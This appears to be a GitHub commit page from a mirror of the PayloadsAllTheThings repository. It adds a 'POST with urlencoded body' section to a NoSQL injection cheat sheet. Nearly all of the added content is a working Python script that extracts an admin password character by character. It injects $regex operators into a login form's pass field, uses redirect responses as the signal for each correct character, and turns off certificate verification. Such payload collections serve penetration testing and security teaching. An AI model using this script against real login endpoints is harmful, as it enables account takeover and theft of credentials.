1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-03-28 22:50:05 +01:00

NoSQLi: add POST with urlencoded body

This commit is contained in:
Alexandre ZANNI 2021-11-07 17:49:50 +01:00 committed by GitHub
parent 7d9dd6806e
commit e0f851e6e9
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -98,6 +98,30 @@ while True:
password += c
```
### POST with urlencoded body
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/x-www-form-urlencoded'}
while True:
for c in string.printable:
if c not in ['*','+','.','?','|','&','$']:
payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
if r.status_code == 302 and r.headers['Location'] == '/dashboard':
print("Found one more char : %s" % (password+c))
password += c
```
### GET
```python